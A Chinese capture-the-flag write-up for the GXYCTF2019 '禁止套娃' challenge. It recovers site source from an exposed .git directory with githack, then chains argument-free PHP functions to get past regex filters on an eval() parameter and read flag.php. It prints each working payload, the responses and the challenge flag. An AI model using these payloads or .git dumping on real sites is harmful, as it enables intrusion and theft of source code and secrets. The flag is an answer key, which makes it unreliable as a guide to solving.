[GXYCTF2019]禁止套娃 wp

这道题的思路是使用githack工具扫描目标ip/.git,得到index.php,进行代码审计,得到flag

 

git源码泄露的原因:

开发人员在开发时,常常会先把源码提交到远程托管网站(如github),最后再从远程托管网站把源码pull到服务器的web目录下,如果忘记把.git文件删除,就造成此漏洞。利用.git文件恢复处网站的源码,而源码里可能会有数据库的信息。

git的工作区就是目录,git的版本库就是.git文件夹。

py githack http://xxx/.git/

在githack文件夹下会产生扫描到的文件:

index.php

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

第一个int preg_match()函数,不同于preg_match_all(),只匹配一次,preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])的意思是看exp里有无data://或filter://或php://或phar://,前面有!,所以传参不能有这些,

第二个preg_replace()函数是替换功能,把exp中的:a-z,_,+表示1次或多次,(,),   (?R)表示当前表达式,第二个?表示前面的(?R)零次或多次,这里的作用是过滤了类似于a(b())之类的函数

第三个preg_match()函数,看exp里有无:et或na或info或dec或bin或hex或oct或pi或log,前面有!,所以exp里不能有这些东西

 

我们要先看目录 使用scandir('.');但是不能出现一点,因为.不在正则里,exp里有.preg_replace()函数调用后就会有.,就不是;了

localeconv()函数返回一包含本地数字及货币格式信息的数组,而数组第一项就是一点

current()返回数组中的当前单元, 默认取第一个值。这里我们就能够得到当前目录了

exp=print_r(scandir(current(localeconv())));

回显是:Array ( [0] => . [1] => .. [2] => .git [3] => flag.php [4] => index.php )

思考一下怎么得到flag.php:

array_reverse()函数以相反的元素顺序返回数组。

 ?exp=print_r(array_reverse(scandir(current(localeconv()))));

返回Array ( [0] => index.php [1] => flag.php [2] => .git [3] => .. [4] => . )

这样flag.php就在数组里的第二个,再用next()函数得到指针下一个元素,

?exp=print_r(next(array_reverse(scandir(current(localeconv())))));

返回flag.php

再用highlight_file()函数得到flag.php的源码

?exp=print_r(highlight_file(next(array_reverse(scandir(current(localeconv()))))));

返回
<?php
$flag "flag{c773d37d-e80a-40aa-b69b-9c653342c79a}";
?>

 

posted @ 2022-06-25 00:24  Galio  阅读(185)  评论(0编辑  收藏  举报